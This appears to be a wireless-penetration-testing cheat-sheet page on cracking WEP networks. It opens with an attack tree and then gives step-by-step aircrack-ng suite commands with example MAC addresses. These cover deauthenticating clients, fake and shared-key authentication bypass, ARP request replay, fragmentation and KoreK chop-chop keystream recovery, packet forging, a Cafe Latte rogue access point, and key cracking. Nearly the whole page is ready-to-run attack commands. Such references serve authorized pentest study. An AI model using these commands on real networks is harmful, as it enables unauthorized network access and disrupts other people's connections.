Attacking WEP

WEP
├── AUTH = OPN
│   ├── With client
│   │   ├── # ARP Request Replay Attack
│   │   ├── # Fragmentation Attack
│   │   ├── # Korek Chop Chop Attack
│   │   ├── # Interactive Packet Replay Attack
│   │   ├── # Cafe Latte Attack
│   │   └── # Deauthentication Attack
│   └── Without client
│       └── # Fake Authentication
│           ├── → Fragmentation Attack  → ARP Request Replay Attack
│           └── → Korek ChopChop Attack → ARP Request Replay Attack
└── AUTH = SKA
    └── With client (required)
        ├── # Deauthentication Attack        (capture SKA keystream)
        ├── # Fake Shared Key Authentication (replay captured keystream)
        └── # ARP Request Replay Attack      (generate IVs)

Bypassing WEP Shared Key Authentication

# AUTH = SKA
# Start monitor mode
airmon-ng start <INTERFACE>
# Packet capture
airodump-ng -w <CAPTURE_NAME> -c <CHANNEL> --bssid <BSSID> <INTERFACE>
# Get your MAC address
macchanger --show <INTERFACE>
# Fake authentication attack (It should failed)
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>
# Deauthentication attack (If there is a client)
aireplay-ng -0 1 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>
# Fake shared key authentication using the XOR keystream
aireplay-ng -1 60 -e <ESSID> -y wepshared-<NAME>.xor -a <BSSID> -h <YOUR_MAC> <INTERFACE>
# ARP replay attack
aireplay-ng -3 -b <BSSID> -h <YOUR_MAC> <INTERFACE>
# Deauthentication attack (If there is a client)
aireplay-ng -0 1 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>
# Crack 
aircrack-ng <CAPTURE_NAME>

ARP Request Replay Attack

# ARP Request Replay Attack : generate (IVs) By capturing and replaying ARP requests
airodump-ng wlan0mon -c 1 -w WEP
# Performing the Attack : generate initialization vectors (IVs)
sudo aireplay-ng -3 -b B2:D1:AC:E1:21:D1 -h 4A:DD:C6:71:5A:3B wlan0mon
# Crack
aircrack-ng -b B2:D1:AC:E1:21:D1 WEP-01.cap

Fragmentation Attack

# recovering the PRGA using fragmented packets
# Enabling Monitor Mode
airodump-ng wlan0mon -c 1 -w WEP
# fragmentation attack : getting PRGA xor file
aireplay-ng -5 -b A2:BD:32:EB:21:15 -h 42:E9:11:39:88:AE wlan0mon
# analyze the capture file : detecting IP of AP and station (Optional we can use broadcast)
tcpdump -s 0 -n -e -r replay_src-0805-191842.cap
# forge an ARP request using packetforge-ng with the IPs or with broadcast
packetforge-ng -0 -a [AP_MAC] -h [STATION_MAC] -k [AP_IP] -l [STATION_MAC] -y fragment-0805-191851.xor -w forgedarp.cap
packetforge-ng -0 -a A2:BD:32:EB:21:15 -h 42:E9:11:39:88:AE -k 255.255.255.255 -l 255.255.255.255 -y fragment-0805-191851.xor -w forgedarp.cap
# Inject the packet
aireplay-ng -2 -r forgedarp.cap -h 42:E9:11:39:88:AE wlan0mon
# Accelerate the IV generation process with ARP request replay attack
sudo aireplay-ng -3 -b A2:BD:32:EB:21:15 -h 42:E9:11:39:88:AE wlan0mon
# Crack
aircrack-ng -b A2:BD:32:EB:21:15 WEP-01.cap

Korek Chop Chop Attack

airodump-ng wlan0mon -c 1 -w WEP
# retrieving the PRGA keystream bit by bit
aireplay-ng -4 -b C8:D1:4D:EA:21:A6 -h 7E:8D:FC:DD:D7:2C wlan0mon
# analyze the capture file : detecting IP of AP and station (Optional we can use broadcast)
tcpdump -s 0 -n -e -r replay_dec-0805-221220.cap
# forge an ARP request using packetforge-ng with the IPs
packetforge-ng -0 -a C8:D1:4D:EA:21:A6 -h 7E:8D:FC:DD:D7:2C -k 192.168.1.1 -l 192.168.1.75 -y replay_dec-0805-221220.xor -w forgedarp.cap
packetforge-ng -0 -a C8:D1:4D:EA:21:A6 -h 7E:8D:FC:DD:D7:2C -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0805-221220.xor -w forgedarp.cap
# Injecting the packet
aireplay-ng -2 -r forgedarp.cap -h 7E:8D:FC:DD:D7:2C wlan0mon
# Accelerate the IV generation process with ARP request replay attack
aireplay-ng -3 -b C8:D1:4D:EA:21:A6 -h 7E:8D:FC:DD:D7:2C wlan0mon
# Crack
aircrack-ng -b C8:D1:4D:EA:21:A6 WEP-01.cap

The Cafe Latte Attack

# airodump-ng
airodump-ng wlan0mon -c 1 -w WEP
# listen for a station to connect, and replay any captured ARP requests to the client
aireplay-ng -6 -D -b B2:D1:AC:E1:21:D1 -h B6:1F:98:CB:10:78 wlan0mon
# launch a fake access point with identical information with the AP
airbase-ng -c 1 -a B2:D1:AC:E1:21:D1  -e "HackTheWifi" wlan0mon -W 1 -L
# deauth the client
aireplay-ng -0 10 -a B2:D1:AC:E1:21:D1 -c B6:1F:98:CB:10:78  wlan0mon
# Crack
aircrack-ng -b B2:D1:AC:E1:21:D1 WEP-01.cap

Attacking WEP Access Points Without Clients

# airodump-ng
sudo airodump-ng -c 3 --bssid 60:38:E0:71:E9:DC wlan0mon -w WEP
# Fake Auth
aireplay-ng -1 1000 -o 1 -q 5 -e [ESSID] -a [BSSID] -h [My_MAC] wlan0mon
aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [My_MAC] wlan0mon
# We initiate either a fragmentation or KoreK chop chop attack with request replay attack to speed things up
# trying KoreK chop chop attack
aireplay-ng -4 -b 60:38:E0:71:E9:DC -h [My_MAC] wlan0mon
# analyze the capture file : detecting IP of AP and our IP (Optional we can use broadcast)
tcpdump -s 0 -n -e -r replay_dec-0805-221220.cap
# forge an ARP request using packetforge-ng with the IPs
packetforge-ng -0 -a 60:38:e0:71:e9:dc -h [My_MAC] -k 192.168.1.1 -l 192.168.1.64 -y replay_dec-1229-160018.xor -w forgedarp.cap
packetforge-ng -0 -a 60:38:e0:71:e9:dc -h [My_MAC] -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-1229-160018.xor -w forgedarp.cap
# Inject the packet
aireplay-ng -2 -r forgedarp.cap wlan0mon
# Accelerate the IV generation process with ARP request replay attack
aireplay-ng -3 -b 60:38:e0:71:e9:dc -h [My_MAC] wlan0mon
# Crack
sudo aircrack-ng -b 60:38:E0:71:E9:DC WEP-01.cap

PreviousAttacking Captive Portals NextAttacking WPA

Last updated 13 days ago

hashtagBypassing WEP Shared Key Authentication

hashtagARP Request Replay Attack

hashtagFragmentation Attack

hashtagKorek Chop Chop Attack

hashtagThe Cafe Latte Attack

hashtagAttacking WEP Access Points Without Clients

Bypassing WEP Shared Key Authentication

ARP Request Replay Attack

Fragmentation Attack

Korek Chop Chop Attack

The Cafe Latte Attack

Attacking WEP Access Points Without Clients